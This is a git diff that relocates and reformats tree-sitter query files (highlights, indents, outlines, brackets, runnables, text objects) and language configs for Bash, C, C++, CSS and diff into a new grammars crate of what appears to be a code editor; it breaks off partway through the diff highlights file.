+tree-sitter-yaml = { workspace = true, optional = true } + +[features] +load-grammars = [ + "tree-sitter", + "tree-sitter-bash", + "tree-sitter-c", + "tree-sitter-cpp", + "tree-sitter-css", + "tree-sitter-diff", + "tree-sitter-gitcommit", + "tree-sitter-go", + "tree-sitter-go-mod", + "tree-sitter-gowork", + "tree-sitter-jsdoc", + "tree-sitter-json", + "tree-sitter-md", + 
"tree-sitter-python", + "tree-sitter-regex", + "tree-sitter-rust", + "tree-sitter-typescript", + "tree-sitter-yaml", +] +test-support = ["load-grammars"] diff --git a/crates/eval/LICENSE-GPL b/crates/grammars/LICENSE-GPL similarity index 100% rename from crates/eval/LICENSE-GPL rename to crates/grammars/LICENSE-GPL diff --git a/crates/grammars/src/bash/brackets.scm b/crates/grammars/src/bash/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..aba1fa2b35735d4380761ea6e1360305556072b3 --- /dev/null +++ b/crates/grammars/src/bash/brackets.scm @@ -0,0 +1,62 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("`" @open + "`" @close) + (#set! rainbow.exclude)) + +(("do" @open + "done" @close) + (#set! newline.only) + (#set! rainbow.exclude)) + +((case_statement + ("in" @open + "esac" @close)) + (#set! newline.only) + (#set! rainbow.exclude)) + +((if_statement + (elif_clause + "then" @open) + (else_clause + "else" @close)) + (#set! newline.only) + (#set! rainbow.exclude)) + +((if_statement + (else_clause + "else" @open) + "fi" @close) + (#set! newline.only) + (#set! rainbow.exclude)) + +((if_statement + "then" @open + (elif_clause + "elif" @close)) + (#set! newline.only) + (#set! rainbow.exclude)) + +((if_statement + "then" @open + (else_clause + "else" @close)) + (#set! newline.only) + (#set! rainbow.exclude)) + +((if_statement + ("then" @open + "fi" @close)) + (#set! newline.only) + (#set! 
rainbow.exclude)) diff --git a/crates/languages/src/bash/config.toml b/crates/grammars/src/bash/config.toml similarity index 97% rename from crates/languages/src/bash/config.toml rename to crates/grammars/src/bash/config.toml index 8ff4802aee5124201d013e0b2f0b01c7046e55a0..06574629f186800f4d95244d7c4129cbc6505d22 100644 --- a/crates/languages/src/bash/config.toml +++ b/crates/grammars/src/bash/config.toml @@ -2,6 +2,7 @@ name = "Shell Script" code_fence_block_name = "bash" grammar = "bash" path_suffixes = ["sh", "bash", "bashrc", "bash_profile", "bash_aliases", "bash_logout", "bats", "profile", "zsh", "zshrc", "zshenv", "zsh_profile", "zsh_aliases", "zsh_histfile", "zlogin", "zprofile", ".env", "PKGBUILD", "APKBUILD"] +modeline_aliases = ["sh", "shell", "zsh", "fish"] line_comments = ["# "] first_line_pattern = '^#!.*\b(?:ash|bash|bats|dash|sh|zsh)\b' autoclose_before = "}])" diff --git a/crates/languages/src/bash/highlights.scm b/crates/grammars/src/bash/highlights.scm similarity index 82% rename from crates/languages/src/bash/highlights.scm rename to crates/grammars/src/bash/highlights.scm index 4a8d7eaf345b147270302b5ba8f20c975494766e..bc1c3b7ec1159f6d19cdf20ab36e0a02db076c66 100644 --- a/crates/languages/src/bash/highlights.scm +++ b/crates/grammars/src/bash/highlights.scm @@ -43,13 +43,17 @@ (comment) @keyword.directive) (#match? 
@keyword.directive "^#![ \t]*/")) -(function_definition name: (word) @function) -(command_name (word) @function) +(function_definition + name: (word) @function) + +(command_name + (word) @function) (command argument: [ (word) @variable.parameter - (_ (word) @variable.parameter) + (_ + (word) @variable.parameter) ]) [ @@ -65,7 +69,6 @@ (expansion) ] @embedded - [ "$" "&&" @@ -89,9 +92,7 @@ (test_operator) @keyword.operator -[ - ";" -] @punctuation.delimiter +";" @punctuation.delimiter [ "(" @@ -104,6 +105,7 @@ (simple_expansion "$" @punctuation.special) + (expansion "${" @punctuation.special "}" @punctuation.special) @embedded @@ -112,10 +114,11 @@ "$(" @punctuation.special ")" @punctuation.special) -( - (command (_) @constant) - (#match? @constant "^-") -) +((command + (_) @constant) + (#match? @constant "^-")) + +(case_item + value: (_) @string.regex) -(case_item value: (_) @string.regex) (special_variable_name) @variable.special diff --git a/crates/languages/src/bash/indents.scm b/crates/grammars/src/bash/indents.scm similarity index 70% rename from crates/languages/src/bash/indents.scm rename to crates/grammars/src/bash/indents.scm index 468fc595e56e2616547dc3e752318cd89df4a363..25a0dc20fd7fff62cd355d20917260e8e781e90e 100644 --- a/crates/languages/src/bash/indents.scm +++ b/crates/grammars/src/bash/indents.scm @@ -1,12 +1,27 @@ -(_ "[" "]" @end) @indent -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent +(_ + "[" + "]" @end) @indent + +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent (function_definition) @start.function + (if_statement) @start.if + (elif_clause) @start.elif + (else_clause) @start.else + (for_statement) @start.for + (while_statement) @start.while + (case_statement) @start.case + (case_item) @start.case_item diff --git a/crates/grammars/src/bash/injections.scm b/crates/grammars/src/bash/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..2f0e58eb6431515b86b6042e5828263341513e99 --- /dev/null +++ 
b/crates/grammars/src/bash/injections.scm @@ -0,0 +1,2 @@ +((comment) @injection.content + (#set! injection.language "comment")) diff --git a/crates/languages/src/bash/overrides.scm b/crates/grammars/src/bash/overrides.scm similarity index 97% rename from crates/languages/src/bash/overrides.scm rename to crates/grammars/src/bash/overrides.scm index 81fec9a5f57b28fc67b4781ec37df43559e21dc9..544e9876f8ea8f1d676ee21731fdcb30fc7163ec 100644 --- a/crates/languages/src/bash/overrides.scm +++ b/crates/grammars/src/bash/overrides.scm @@ -1,2 +1,3 @@ (comment) @comment.inclusive + (string) @string diff --git a/crates/grammars/src/bash/redactions.scm b/crates/grammars/src/bash/redactions.scm new file mode 100644 index 0000000000000000000000000000000000000000..5c2c83aa666e31ae23b7e54f966638f41f98244e --- /dev/null +++ b/crates/grammars/src/bash/redactions.scm @@ -0,0 +1,2 @@ +(variable_assignment + value: (_) @redact) diff --git a/crates/grammars/src/bash/runnables.scm b/crates/grammars/src/bash/runnables.scm new file mode 100644 index 0000000000000000000000000000000000000000..3856495422dcd84b9c3619d34778e2183aae8498 --- /dev/null +++ b/crates/grammars/src/bash/runnables.scm @@ -0,0 +1,5 @@ +; Run bash scripts +((program + . + (_) @run) @_bash-script + (#set! 
tag bash-script)) diff --git a/crates/languages/src/bash/textobjects.scm b/crates/grammars/src/bash/textobjects.scm similarity index 76% rename from crates/languages/src/bash/textobjects.scm rename to crates/grammars/src/bash/textobjects.scm index cca2f7d9e9e4a876984a602ee308ad7270b684dc..9a5e4853ee711abbc7407185a6da19b0c9cc3fef 100644 --- a/crates/languages/src/bash/textobjects.scm +++ b/crates/grammars/src/bash/textobjects.scm @@ -2,6 +2,6 @@ body: (_ "{" (_)* @function.inside - "}" )) @function.around + "}")) @function.around (comment) @comment.around diff --git a/crates/grammars/src/c/brackets.scm b/crates/grammars/src/c/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..313d212a5eb28d006775781576d50e359be675a2 --- /dev/null +++ b/crates/grammars/src/c/brackets.scm @@ -0,0 +1,16 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("'" @open + "'" @close) + (#set! 
rainbow.exclude)) diff --git a/crates/languages/src/c/config.toml b/crates/grammars/src/c/config.toml similarity index 96% rename from crates/languages/src/c/config.toml rename to crates/grammars/src/c/config.toml index c490269b12309632d2fd8fb944ed48ee74c46075..a3b55f4f2d4fe3bfb19100e5877661c5841126a9 100644 --- a/crates/languages/src/c/config.toml +++ b/crates/grammars/src/c/config.toml @@ -17,4 +17,3 @@ brackets = [ ] debuggers = ["CodeLLDB", "GDB"] documentation_comment = { start = "/*", prefix = "* ", end = "*/", tab_size = 1 } -import_path_strip_regex = "^<|>$" diff --git a/crates/languages/src/c/highlights.scm b/crates/grammars/src/c/highlights.scm similarity index 95% rename from crates/languages/src/c/highlights.scm rename to crates/grammars/src/c/highlights.scm index e426bd4f9048a96c09aef297f95c420c9ec21458..b73c8e80b8acb61cc0cf47ed6585202eb73f4a7b 100644 --- a/crates/languages/src/c/highlights.scm +++ b/crates/grammars/src/c/highlights.scm @@ -38,7 +38,7 @@ "#ifndef" "#include" (preproc_directive) -] @preproc +] @keyword.preproc @preproc [ "=" @@ -116,19 +116,23 @@ (identifier) @variable ((identifier) @constant - (#match? @constant "^_*[A-Z][A-Z\\d_]*$")) + (#match? 
@constant "^_*[A-Z][A-Z\\d_]*$")) (call_expression function: (identifier) @function) + (call_expression function: (field_expression field: (field_identifier) @function)) + (function_declarator declarator: (identifier) @function) + (preproc_function_def name: (identifier) @function.special) (field_identifier) @property + (statement_identifier) @label [ @@ -139,6 +143,7 @@ ; GNU __attribute__ (attribute_specifier) @attribute + (attribute_specifier (argument_list (identifier) @attribute)) @@ -146,5 +151,6 @@ ; C23 [[attributes]] (attribute prefix: (identifier) @attribute) + (attribute name: (identifier) @attribute) diff --git a/crates/languages/src/c/indents.scm b/crates/grammars/src/c/indents.scm similarity index 79% rename from crates/languages/src/c/indents.scm rename to crates/grammars/src/c/indents.scm index b6d3c3c3bf7d1a05fd90667e42418bf9a389f8fb..0b55631e5ca6cdfca377f5bf4018d751cdf31bf4 100644 --- a/crates/languages/src/c/indents.scm +++ b/crates/grammars/src/c/indents.scm @@ -9,15 +9,25 @@ (else_clause) ] @indent -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent ((comment) @indent - (#match? @indent "^/\\*")) + (#match? @indent "^/\\*")) (if_statement) @start.if + (for_statement) @start.for + (while_statement) @start.while + (do_statement) @start.do + (switch_statement) @start.switch + (else_clause) @start.else diff --git a/crates/languages/src/c/injections.scm b/crates/grammars/src/c/injections.scm similarity index 54% rename from crates/languages/src/c/injections.scm rename to crates/grammars/src/c/injections.scm index 9ec3cf1f780123426f681ad758179b81697e59c5..010c697f08adec1d196833b4de492027a80960a4 100644 --- a/crates/languages/src/c/injections.scm +++ b/crates/grammars/src/c/injections.scm @@ -1,6 +1,5 @@ ((comment) @injection.content - (#set! injection.language "comment") -) + (#set! injection.language "comment")) ((comment) @injection.content (#match? 
@injection.content "^(///|//!|/\\*\\*|/\\*!)(.*)") @@ -8,9 +7,9 @@ (#set! injection.include-children)) (preproc_def - value: (preproc_arg) @injection.content - (#set! injection.language "c")) + value: (preproc_arg) @injection.content + (#set! injection.language "c")) (preproc_function_def - value: (preproc_arg) @injection.content - (#set! injection.language "c")) + value: (preproc_arg) @injection.content + (#set! injection.language "c")) diff --git a/crates/grammars/src/c/outline.scm b/crates/grammars/src/c/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..abc9608343826545b9ebfd5f915d6352943911f6 --- /dev/null +++ b/crates/grammars/src/c/outline.scm @@ -0,0 +1,89 @@ +(preproc_def + "#define" @context + name: (_) @name) @item + +(preproc_function_def + "#define" @context + name: (_) @name + parameters: (preproc_params + "(" @context + ")" @context)) @item + +(struct_specifier + "struct" @context + name: (_) @name) @item + +(union_specifier + "union" @context + name: (_) @name) @item + +(enum_specifier + "enum" @context + name: (_) @name) @item + +(enumerator + name: (_) @name) @item + +(field_declaration + type: (_) @context + declarator: (field_identifier) @name) @item + +(type_definition + "typedef" @context + declarator: (_) @name) @item + +(declaration + (type_qualifier)? @context + type: (_)? @context + declarator: [ + (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)) + (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context))) + (pointer_declarator + "*" @context + declarator: (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)))) + ]) @item + +(function_definition + (type_qualifier)? @context + type: (_)? 
@context + declarator: [ + (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)) + (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context))) + (pointer_declarator + "*" @context + declarator: (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)))) + ]) @item + +(comment) @annotation diff --git a/crates/languages/src/c/overrides.scm b/crates/grammars/src/c/overrides.scm similarity index 98% rename from crates/languages/src/c/overrides.scm rename to crates/grammars/src/c/overrides.scm index 36473eb300fd01370e1947873435a821e2d6417a..7c4cf69697200efa1cedd59b895d5ebd064ce486 100644 --- a/crates/languages/src/c/overrides.scm +++ b/crates/grammars/src/c/overrides.scm @@ -1,2 +1,3 @@ (comment) @comment.inclusive + (string_literal) @string diff --git a/crates/grammars/src/c/runnables.scm b/crates/grammars/src/c/runnables.scm new file mode 100644 index 0000000000000000000000000000000000000000..50c5ef5b71b4df5d0735a6a5019e9aee5a19f083 --- /dev/null +++ b/crates/grammars/src/c/runnables.scm @@ -0,0 +1,6 @@ +; Tag the main function +((function_definition + declarator: (function_declarator + declarator: (identifier) @run)) @_c-main + (#eq? @run "main") + (#set! 
tag c-main)) diff --git a/crates/grammars/src/c/textobjects.scm b/crates/grammars/src/c/textobjects.scm new file mode 100644 index 0000000000000000000000000000000000000000..fd5ec0b49b7484a8ef2cbb7cb321f7020bdaeff8 --- /dev/null +++ b/crates/grammars/src/c/textobjects.scm @@ -0,0 +1,34 @@ +(declaration + declarator: (function_declarator)) @function.around + +(function_definition + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(preproc_function_def + value: (_) @function.inside) @function.around + +(comment) @comment.around + +(struct_specifier + body: (_ + "{" + (_)* @class.inside + "}")) @class.around + +(enum_specifier + body: (_ + "{" + [ + (_) + ","? + ]* @class.inside + "}")) @class.around + +(union_specifier + body: (_ + "{" + (_)* @class.inside + "}")) @class.around diff --git a/crates/grammars/src/cpp/brackets.scm b/crates/grammars/src/cpp/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..e0330c9b1f2ebdd45480c54e9053503a6b6f611b --- /dev/null +++ b/crates/grammars/src/cpp/brackets.scm @@ -0,0 +1,19 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +("<" @open + ">" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("'" @open + "'" @close) + (#set! 
rainbow.exclude)) diff --git a/crates/languages/src/cpp/config.toml b/crates/grammars/src/cpp/config.toml similarity index 82% rename from crates/languages/src/cpp/config.toml rename to crates/grammars/src/cpp/config.toml index 10c36a6ded1e1f3a1204d1e15af47fee78b8e049..138d4a78e45f153eaa2eeb72a91654416154ed33 100644 --- a/crates/languages/src/cpp/config.toml +++ b/crates/grammars/src/cpp/config.toml @@ -1,6 +1,7 @@ name = "C++" grammar = "cpp" -path_suffixes = ["cc", "hh", "cpp", "h", "hpp", "cxx", "hxx", "c++", "h++", "ipp", "inl", "ino", "ixx", "cu", "cuh", "C", "H"] +path_suffixes = ["cc", "ccm", "hh", "cpp", "cppm", "h", "hpp", "cxx", "cxxm", "hxx", "c++", "c++m", "h++", "ipp", "inl", "ino", "ixx", "cu", "cuh", "C", "H"] +modeline_aliases = ["c++", "cpp", "cxx"] line_comments = ["// ", "/// ", "//! "] first_line_pattern = '^//.*-\*-\s*C\+\+\s*-\*-' decrease_indent_patterns = [ @@ -18,4 +19,3 @@ brackets = [ ] debuggers = ["CodeLLDB", "GDB"] documentation_comment = { start = "/*", prefix = "* ", end = "*/", tab_size = 1 } -import_path_strip_regex = "^<|>$" diff --git a/crates/languages/src/cpp/highlights.scm b/crates/grammars/src/cpp/highlights.scm similarity index 90% rename from crates/languages/src/cpp/highlights.scm rename to crates/grammars/src/cpp/highlights.scm index dbb79e69b04e351ca231b45b21507e305b2cabf5..281da4215c8269172816c6f37a5e6e866c04a140 100644 --- a/crates/languages/src/cpp/highlights.scm +++ b/crates/grammars/src/cpp/highlights.scm @@ -1,13 +1,15 @@ (identifier) @variable + (field_identifier) @property + (namespace_identifier) @namespace (concept_definition - name: (identifier) @concept) + name: (identifier) @concept) (requires_clause - constraint: (template_type - name: (type_identifier) @concept)) + constraint: (template_type + name: (type_identifier) @concept)) (module_name (identifier) @module) @@ -83,18 +85,23 @@ (operator_name "<=>" @operator.spaceship) -(destructor_name (identifier) @function) +(destructor_name + (identifier) 
@function) ((namespace_identifier) @type - (#match? @type "^[A-Z]")) + (#match? @type "^[A-Z]")) (auto) @type + (type_identifier) @type + type: (primitive_type) @type.builtin + (sized_type_specifier) @type.builtin ; GNU __attribute__ (attribute_specifier) @attribute + (attribute_specifier (argument_list (identifier) @attribute)) @@ -102,15 +109,18 @@ type: (primitive_type) @type.builtin ; C++11 [[attributes]] (attribute prefix: (identifier) @attribute) + (attribute name: (identifier) @attribute) ((identifier) @constant.builtin - (#match? @constant.builtin "^_*[A-Z][A-Z\\d_]*$")) + (#match? @constant.builtin "^_*[A-Z][A-Z\\d_]*$")) (statement_identifier) @label + (this) @variable.builtin -("static_assert") @function.builtin + +"static_assert" @function.builtin [ "alignas" @@ -186,7 +196,7 @@ type: (primitive_type) @type.builtin "#ifndef" "#include" (preproc_directive) -] @preproc +] @keyword.preproc @preproc (comment) @comment @@ -197,7 +207,7 @@ type: (primitive_type) @type.builtin [ (null) - ("nullptr") + "nullptr" ] @constant.builtin (number_literal) @number @@ -285,5 +295,8 @@ type: (primitive_type) @type.builtin (binary_expression operator: "<=>" @operator.spaceship) -(conditional_expression ":" @operator) -(user_defined_literal (literal_suffix) @operator) +(conditional_expression + ":" @operator) + +(user_defined_literal + (literal_suffix) @operator) diff --git a/crates/grammars/src/cpp/indents.scm b/crates/grammars/src/cpp/indents.scm new file mode 100644 index 0000000000000000000000000000000000000000..0b55631e5ca6cdfca377f5bf4018d751cdf31bf4 --- /dev/null +++ b/crates/grammars/src/cpp/indents.scm @@ -0,0 +1,33 @@ +[ + (field_expression) + (assignment_expression) + (init_declarator) + (if_statement) + (for_statement) + (while_statement) + (do_statement) + (else_clause) +] @indent + +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent + +((comment) @indent + (#match? 
@indent "^/\\*")) + +(if_statement) @start.if + +(for_statement) @start.for + +(while_statement) @start.while + +(do_statement) @start.do + +(switch_statement) @start.switch + +(else_clause) @start.else diff --git a/crates/languages/src/cpp/injections.scm b/crates/grammars/src/cpp/injections.scm similarity index 63% rename from crates/languages/src/cpp/injections.scm rename to crates/grammars/src/cpp/injections.scm index 60c6ea7b63eb6dcb7e1bae02c66045266c0b6cd5..0f622d4edbada60d162e14260dfb1d05423cd503 100644 --- a/crates/languages/src/cpp/injections.scm +++ b/crates/grammars/src/cpp/injections.scm @@ -1,6 +1,5 @@ ((comment) @injection.content - (#set! injection.language "comment") -) + (#set! injection.language "comment")) ((comment) @injection.content (#match? @injection.content "^(///|//!|/\\*\\*|/\\*!)(.*)") @@ -8,12 +7,12 @@ (#set! injection.include-children)) (preproc_def - value: (preproc_arg) @injection.content - (#set! injection.language "c++")) + value: (preproc_arg) @injection.content + (#set! injection.language "c++")) (preproc_function_def - value: (preproc_arg) @injection.content - (#set! injection.language "c++")) + value: (preproc_arg) @injection.content + (#set! injection.language "c++")) (raw_string_literal delimiter: (raw_string_delimiter) @injection.language diff --git a/crates/grammars/src/cpp/outline.scm b/crates/grammars/src/cpp/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..041ff7d1b02ec0be14aead872c5436b2c897e125 --- /dev/null +++ b/crates/grammars/src/cpp/outline.scm @@ -0,0 +1,195 @@ +(preproc_def + "#define" @context + name: (_) @name) @item + +(preproc_function_def + "#define" @context + name: (_) @name + parameters: (preproc_params + "(" @context + ")" @context)) @item + +(namespace_definition + "inline"? 
@context + "namespace" @context + name: (_) @name) @item + +(type_definition + "typedef" @context + declarator: (_) @name) @item + +(struct_specifier + "struct" @context + name: (_) @name) @item + +(class_specifier + "class" @context + name: (_) @name) @item + +(enum_specifier + "enum" @context + [ + "class" + "struct" + ]? @context + name: (_) @name) @item + +(union_specifier + "union" @context + name: (_) @name) @item + +(enumerator + name: (_) @name) @item + +(concept_definition + "concept" @context + name: (_) @name) @item + +(declaration + [ + (storage_class_specifier) + (type_qualifier) + ]* @context + type: (_) @context + declarator: [ + ; The declaration may define multiple variables, using @item on the + ; declarator so that they get distinct ranges. + (init_declarator + declarator: (_) @item @name) + (identifier) @item @name + ] @item) + +(function_definition + [ + (storage_class_specifier) + (type_qualifier) + ]* @context + type: (_)? @context + declarator: [ + (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)) + (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context))) + (pointer_declarator + "*" @context + declarator: (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)))) + (reference_declarator + [ + "&" + "&&" + ] @context + (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context))) + ] + (type_qualifier)? @context) @item + +(declaration + [ + (storage_class_specifier) + (type_qualifier) + ]* @context + type: (_)? 
@context + declarator: [ + (field_identifier) @name + (pointer_declarator + "*" @context + declarator: (field_identifier) @name) + (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)) + (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context))) + (pointer_declarator + "*" @context + declarator: (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)))) + (reference_declarator + [ + "&" + "&&" + ] @context + (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context))) + ] + (type_qualifier)? @context) @item + +(field_declaration + [ + (storage_class_specifier) + (type_qualifier) + ]* @context + type: (_) @context + declarator: [ + (field_identifier) @name + (pointer_declarator + "*" @context + declarator: (field_identifier) @name) + (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)) + (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context))) + (pointer_declarator + "*" @context + declarator: (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)))) + (reference_declarator + [ + "&" + "&&" + ] @context + (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context))) + ; Fields declarations may define multiple fields, and so @item is on the + ; declarator so they each get distinct ranges. + ] @item + (type_qualifier)? 
@context) + +(comment) @annotation diff --git a/crates/languages/src/cpp/overrides.scm b/crates/grammars/src/cpp/overrides.scm similarity index 98% rename from crates/languages/src/cpp/overrides.scm rename to crates/grammars/src/cpp/overrides.scm index 36473eb300fd01370e1947873435a821e2d6417a..7c4cf69697200efa1cedd59b895d5ebd064ce486 100644 --- a/crates/languages/src/cpp/overrides.scm +++ b/crates/grammars/src/cpp/overrides.scm @@ -1,2 +1,3 @@ (comment) @comment.inclusive + (string_literal) @string diff --git a/crates/grammars/src/cpp/semantic_token_rules.json b/crates/grammars/src/cpp/semantic_token_rules.json new file mode 100644 index 0000000000000000000000000000000000000000..627a5c5f187b47918e6a56069c5ed1bda8583aa6 --- /dev/null +++ b/crates/grammars/src/cpp/semantic_token_rules.json @@ -0,0 +1,7 @@ +[ + { + "token_type": "variable", + "token_modifiers": ["readonly"], + "style": ["constant"] + } +] diff --git a/crates/grammars/src/cpp/textobjects.scm b/crates/grammars/src/cpp/textobjects.scm new file mode 100644 index 0000000000000000000000000000000000000000..61260cd814689aef68ca785132929963eb12d54f --- /dev/null +++ b/crates/grammars/src/cpp/textobjects.scm @@ -0,0 +1,44 @@ +(declaration + declarator: (function_declarator)) @function.around + +(function_definition + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(preproc_function_def + value: (_) @function.inside) @function.around + +(comment) @comment.around + +(struct_specifier + body: (_ + "{" + (_)* @class.inside + "}")) @class.around + +(enum_specifier + body: (_ + "{" + [ + (_) + ","? + ]* @class.inside + "}")) @class.around + +(union_specifier + body: (_ + "{" + (_)* @class.inside + "}")) @class.around + +(class_specifier + body: (_ + "{" + [ + (_) + ":"? + ";"? 
+ ]* @class.inside + "}"?)) @class.around diff --git a/crates/grammars/src/css/brackets.scm b/crates/grammars/src/css/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..313d212a5eb28d006775781576d50e359be675a2 --- /dev/null +++ b/crates/grammars/src/css/brackets.scm @@ -0,0 +1,16 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("'" @open + "'" @close) + (#set! rainbow.exclude)) diff --git a/crates/languages/src/css/config.toml b/crates/grammars/src/css/config.toml similarity index 100% rename from crates/languages/src/css/config.toml rename to crates/grammars/src/css/config.toml diff --git a/crates/languages/src/css/highlights.scm b/crates/grammars/src/css/highlights.scm similarity index 76% rename from crates/languages/src/css/highlights.scm rename to crates/grammars/src/css/highlights.scm index 8fbb9f47d2bcdde1a3b20a184885efb5382557a8..b9d708b661b221544fb58a767981d868d33cb9f7 100644 --- a/crates/languages/src/css/highlights.scm +++ b/crates/grammars/src/css/highlights.scm @@ -30,14 +30,24 @@ ] @keyword.operator (id_name) @selector.id + (class_name) @selector.class (namespace_name) @namespace -(namespace_selector (tag_name) @namespace "|") + +(namespace_selector + (tag_name) @namespace + "|") (attribute_name) @attribute -(pseudo_element_selector "::" (tag_name) @selector.pseudo) -(pseudo_class_selector ":" (class_name) @selector.pseudo) + +(pseudo_element_selector + "::" + (tag_name) @selector.pseudo) + +(pseudo_class_selector + ":" + (class_name) @selector.pseudo) [ (feature_name) @@ -58,13 +68,11 @@ (parenthesized_query (keyword_query) @property) -( - [ - (property_name) - (plain_value) - ] @variable - (#match? @variable "^--") -) +([ + (property_name) + (plain_value) +] @variable + (#match? 
@variable "^--")) [ "@media" @@ -80,6 +88,7 @@ ] @keyword (string_value) @string + (color_value) @string.special [ @@ -97,7 +106,8 @@ ";" ] @punctuation.delimiter -(id_selector "#" @punctuation.delimiter) +(id_selector + "#" @punctuation.delimiter) [ "{" diff --git a/crates/grammars/src/css/indents.scm b/crates/grammars/src/css/indents.scm new file mode 100644 index 0000000000000000000000000000000000000000..a768bb040790087fa905c09a436e81c923db240a --- /dev/null +++ b/crates/grammars/src/css/indents.scm @@ -0,0 +1,3 @@ +(_ + "{" + "}" @end) @indent diff --git a/crates/grammars/src/css/injections.scm b/crates/grammars/src/css/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..2f0e58eb6431515b86b6042e5828263341513e99 --- /dev/null +++ b/crates/grammars/src/css/injections.scm @@ -0,0 +1,2 @@ +((comment) @injection.content + (#set! injection.language "comment")) diff --git a/crates/grammars/src/css/outline.scm b/crates/grammars/src/css/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..6e6e9d3a03c7efd4e7d1814e74705ba3c34e20a1 --- /dev/null +++ b/crates/grammars/src/css/outline.scm @@ -0,0 +1,16 @@ +(stylesheet + (import_statement + "@import" @context + (string_value) @name) @item) + +(rule_set + (selectors + . 
+ (_) @name + ("," @name + (_) @name)*)) @item + +(media_statement + "@media" @context + (_) @name + (block)) @item diff --git a/crates/languages/src/css/overrides.scm b/crates/grammars/src/css/overrides.scm similarity index 98% rename from crates/languages/src/css/overrides.scm rename to crates/grammars/src/css/overrides.scm index e5eade479723c33894b6165085603631bdfe8c64..7ca202fd7bc3db34dd71d5ae7893efe853101ced 100644 --- a/crates/languages/src/css/overrides.scm +++ b/crates/grammars/src/css/overrides.scm @@ -1,2 +1,3 @@ (comment) @comment.inclusive + (string_value) @string diff --git a/crates/grammars/src/css/textobjects.scm b/crates/grammars/src/css/textobjects.scm new file mode 100644 index 0000000000000000000000000000000000000000..88ae6bb8423feec432de6e168507233c1f293b09 --- /dev/null +++ b/crates/grammars/src/css/textobjects.scm @@ -0,0 +1,31 @@ +(comment) @comment.around + +(rule_set + (block + ("{" + (_)* @function.inside + "}"))) @function.around + +(keyframe_block + (block + ("{" + (_)* @function.inside + "}"))) @function.around + +(media_statement + (block + ("{" + (_)* @class.inside + "}"))) @class.around + +(supports_statement + (block + ("{" + (_)* @class.inside + "}"))) @class.around + +(keyframes_statement + (keyframe_block_list + ("{" + (_)* @class.inside + "}"))) @class.around diff --git a/crates/languages/src/diff/config.toml b/crates/grammars/src/diff/config.toml similarity index 100% rename from crates/languages/src/diff/config.toml rename to crates/grammars/src/diff/config.toml diff --git a/crates/languages/src/diff/highlights.scm b/crates/grammars/src/diff/highlights.scm similarity index 66% rename from crates/languages/src/diff/highlights.scm rename to crates/grammars/src/diff/highlights.scm index 4a344389032b9ff12f7c00e42adffb00721737e1..3c9abbe147b6554d6894d5d8d3c8bcf5d93e2edd 100644 --- a/crates/languages/src/diff/highlights.scm +++ b/crates/grammars/src/diff/highlights.scm @@ -3,14 +3,12 @@ [ (addition) (new_file) -] @string -;; TODO: 
